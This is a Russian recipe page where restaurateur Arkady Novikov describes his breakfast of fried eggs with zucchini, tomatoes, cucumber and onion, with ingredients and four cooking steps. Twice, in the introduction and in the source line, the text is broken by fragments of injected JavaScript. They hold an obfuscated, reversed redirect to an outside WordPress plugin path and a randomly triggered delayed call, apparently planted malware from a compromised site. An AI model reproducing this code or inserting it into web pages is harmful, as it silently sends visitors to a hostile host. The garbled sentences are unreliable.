Яичница с овощами на завтрак: рецепт от Аркадия Новикова

Как обычно по воскресеньям мы делимся с вами рецептами тех, кого считаем героями и друзьями fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru. Сегодня о своём любимом завтраке рассказывает один из лучших рестораторов страны Аркадий Новиков. Удивительно, но по утрам он тоже ест яичницу.

Яичница с овощами на завтрак: рецепт от Аркадия Новикова. Изображение номер 1

Фото: novikovgroup.ru

 

Аркадий Новиков

российский ресторатор, предприниматель, владелец Novikov Group (а это более 50 ресторанных проектов)

— Чаще всего на завтрак я ем либо сырники, либо яичницу. Готовлю всё самостоятельно — для меня это не составляет особого труда. Если на приготовление сырников уходит около получаса, то с яичницей справляюсь моментально: «болтушку» и глазунью могу сделать минуты за три—четыре, а яичницу с овощами — максимум за десять.

Яичница с овощами

Яичница с овощами на завтрак: рецепт от Аркадия Новикова. Изображение номер 2

Фото: foodgawker.com

Яичница с овощами на завтрак: рецепт от Аркадия Новикова

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

1

КАЛОРИЙНОСТЬ:

175

175 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Яйцо

2 шт.

Помидоры

2 шт.

Цуккини

100 г

Огурец

100 г

Лук

50 г

Чеснок

по вкусу

Кинза

по вкусу

Соль

по вкусу

Перец чёрный молотый

по вкусу

Растительное масло

по вкусу

  1. Хорошенько разогрейте сковороду, налейте в неё масло и обжарьте лук. Затем добавьте в сковороду предварительно нарезанные овощи и тушите их на небольшом огне, постоянно помешивая. Слегка посолите и поперчите, добавьте чеснок и зелень.
  2. Освободите ложкой место на сковородке и вбейте туда яйца.
  3. Закройте сковородку крышкой и жарьте на низком огне в течение пяти минут.
  4. При желании сверху украсьте блюдо зеленью — и яичница готова. Приятного аппетита!
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector